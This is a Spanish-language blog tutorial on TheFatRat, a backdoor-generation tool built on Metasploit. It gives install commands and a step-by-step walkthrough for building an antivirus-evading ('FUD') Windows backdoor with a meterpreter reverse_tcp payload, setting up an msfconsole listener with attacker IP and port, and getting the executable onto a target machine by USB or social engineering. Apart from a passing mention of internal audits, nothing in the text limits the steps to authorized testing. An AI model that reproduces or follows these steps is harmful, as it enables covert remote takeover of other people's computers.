Thefatrat una herramienta de explotación masiva donde reveló una herramienta fácil de generar puerta trasera y una herramienta fácil para publicar ataques de explotación como ataque de navegador, dll. Esta herramienta compila un malware con una carga popular y luego el malware compilado se puede ejecutar en Windows, Android, Mac. El malware que se creó con esta herramienta también tiene la capacidad de eludir la mayoría
¿Cómo funciona?
TheFatRat es otra herramienta similar a una metasploit que se utiliza para generar backdoors fácilmente. Esta herramienta se usa para compilar algunos de los programas maliciosos con algunas cargas útiles populares que luego se pueden usar para atacar sistemas operativos como Windows, MAC, Linux. Esta herramienta ofrece muchas opciones como crear backdoors, archivos DLL infectados, etc.
La instalacion es muy Simple:
- git clone https://github.com/Screetsec/TheFatRat.git
- cd TheFatRat
- chmod +x setup.sh && ./setup.sh
Luego de iniciarlo, empezará con el checkeo de lo necesario para su funcionamiento:
Una vez lo descarguemos de su Github, necesitamos poner con permisos de ejecución el fichero fatrat y powerfull.sh. Durante el lanzamiento del script fatrat se chequeará sobre los requisitos de la aplicación, un Metasploit instalado, searchsploit, un PostgreSQL y algunos compiladores necesarios para realizar algunos FUD.
Utilizando Searchsploit
Esta es una herramienta de exploit-db, con la que se tiene todos los exploits disponibles en su base de datos en modo offline. TheFatRat permite realizar búsquedas sobre los exploits que tengamos en modo offline gracias a exploit-db y su searchsploit. En la siguiente imagen se puede ver las diferentes opciones de TheFatRat. En sexto lugar encontramos searchsploit.
Una vez introducimos la opción de Searchsploit, TheFatRat nos solicitará el contenido a buscar. Para este ejemplo probamos con Zabbix 2.0.5. Searchsploit nos da la ruta, dentro de la aplicación offline que viene en Kali Linux 2.0 de exploit-db, y el nombre del fichero que contiene el exploit.
Si accedemos a la ruta podemos encontrar el código del módulo, para Metasploit es una herramienta para descubrir exploits en modo offline, por si en alguna auditoria interna no tenemos acceso a Internet. Además, nunca se sabe cuándo se puede reutilizar el código.
PoC: Backdoor con msfvenom y TheFatRat
Utilizando la opción 1 del script accedemos a un submenú dónde se pide que indiquemos la plataforma. Hay gran diversidad de lenguajes y plataformas sobre las que se puede crear la backdoor. Realmente, se está haciendo uso de las opciones que Metasploit dispone y que pueden verse desde la consola con generate -h, dentro de un tipo de módulo payload.
¿Cómo crear un exploit simple para Windows?
Teclear 6 creará un backdoor fud utilizando pwnwinds
Escriba 2 que creará una puerta trasera de fud usando c # + powershell
- Introduzca la dirección IP del oyente/atacante de LHOST. Teclee 192.168.1.12
- Escriba port 4444 o cualquier número de puerto
- Introduzca el nombre del archivo de puerta trasera tstfile
Escriba 3 para usar Windows/Meterpreter/Reverse_tcp
Pulse enter para crear el backdoor
- Después de crear el backdoor, este se guardará en /home/user/Downloads/TheFatRat/output/tstfile.exe
- Para acceder al backdoor vaya a la ubicación anterior
- Abra otro terminal e inicia msfconsole. Msfconsole se utilizará para manejar la sesión en curso
- Teclee msfconsole
- Después de que msfconsole haya iniciado, use exploit/multi/handler
- Luego escriba set payload windows/meterpreter/reverse_tcp
- Escriba LHOST 192.168.1.12
- Escriba LPORT 4444
- Escriba exploit
Para abrir el backdoor en Windows 10, simplemente copie desde aquí y péguelo en pendrive y abra pendrive en Windows 10. También puede usar cualquier técnica de ingeniería social para pasar este archivo a la computadora objetivo
Tiene que copiar dos archivos tstfile.exe y program.cs. Como esta puerta trasera ha creado usando C # y luego haga doble clic en tstfile.exe
A medida que se haga clic en el archivo de destino, aparecerá una ventana emergente y luego se abrirá la sesión de Meterpreter, la sesión de Meterpreter ha comenzado en msfconsole.
Como se creó la sesión, el atacante puede realizar varias tareas de hacking.
Escrito por:
Ing. Roberto Sarmiento Lavayen
10 de Febrero. 2022